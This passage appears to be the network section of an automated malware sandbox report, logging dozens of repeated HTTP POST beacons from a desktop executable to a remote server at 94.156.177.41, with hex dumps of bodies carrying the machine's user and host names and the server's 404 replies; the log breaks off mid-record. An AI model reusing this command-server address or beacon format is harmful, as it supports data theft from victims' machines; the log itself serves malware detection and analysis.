                                                                          44192.168.2.44987894.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:39:38.199114084 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:39:38.319160938 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:39:39.774283886 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:39:39 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          45192.168.2.44988394.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:39:40.033540964 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:39:40.156593084 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:39:41.435794115 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:39:41 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          46192.168.2.44988994.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:39:41.712372065 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:39:41.832001925 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:39:43.209742069 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:39:42 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          47192.168.2.44989494.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:39:43.480339050 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:39:43.599899054 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:39:44.928255081 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:39:44 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          48192.168.2.44989894.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:39:45.187427044 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:39:45.307094097 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:39:46.763998985 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:39:46 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          49192.168.2.44990294.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:39:47.035160065 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:39:47.159996986 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:39:48.566066980 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:39:48 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          50192.168.2.44990794.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:39:49.049055099 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:39:49.169188976 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:39:50.496753931 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:39:50 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          51192.168.2.44991394.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:39:50.772958040 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:39:50.892508984 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:39:52.341576099 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:39:52 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          52192.168.2.44991794.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:39:52.622878075 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:39:52.742489100 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:39:54.151818037 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:39:53 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          53192.168.2.44992294.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:39:54.411840916 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:39:54.532238007 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:39:55.765755892 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:39:55 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          54192.168.2.44992694.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:39:56.034006119 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:39:56.154638052 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:39:57.516748905 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:39:57 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          55192.168.2.44993294.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:39:57.783540010 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:39:57.905220985 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:39:59.228705883 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:39:58 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          56192.168.2.44993794.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:39:59.497380018 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:39:59.617554903 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:40:01.069856882 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:40:00 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          57192.168.2.44994294.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:40:01.341367960 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:40:01.461226940 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:40:02.745074987 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:40:02 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          58192.168.2.44994594.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:40:03.000669003 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:40:03.120404959 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:40:04.526101112 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:40:04 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          59192.168.2.44995194.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:40:04.788348913 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:40:04.910449982 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:40:06.269392967 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:40:06 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          60192.168.2.44995794.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:40:06.531886101 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:40:06.653373957 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:40:08.104639053 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:40:07 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          61192.168.2.44996194.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:40:08.359375000 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:40:08.480379105 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:40:09.891527891 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:40:09 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          62192.168.2.44996594.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:40:10.162188053 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                          Host: 94.156.177.41
                                                                          Accept: */*
                                                                          Content-Type: application/octet-stream
                                                                          Content-Encoding: binary
                                                                          Content-Key: 9D963662
                                                                          Content-Length: 149
                                                                          Connection: close
                                                                          Nov 22, 2024 17:40:10.283380032 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                          Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
                                                                          Nov 22, 2024 17:40:11.557749987 CET193INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.26.1
                                                                          Date: Fri, 22 Nov 2024 16:40:11 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.4.16
                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                          Data Ascii: File not found.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          63192.168.2.44997094.156.177.41807716C:\Users\user\Desktop\file.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 22, 2024 17:40:11.820862055 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
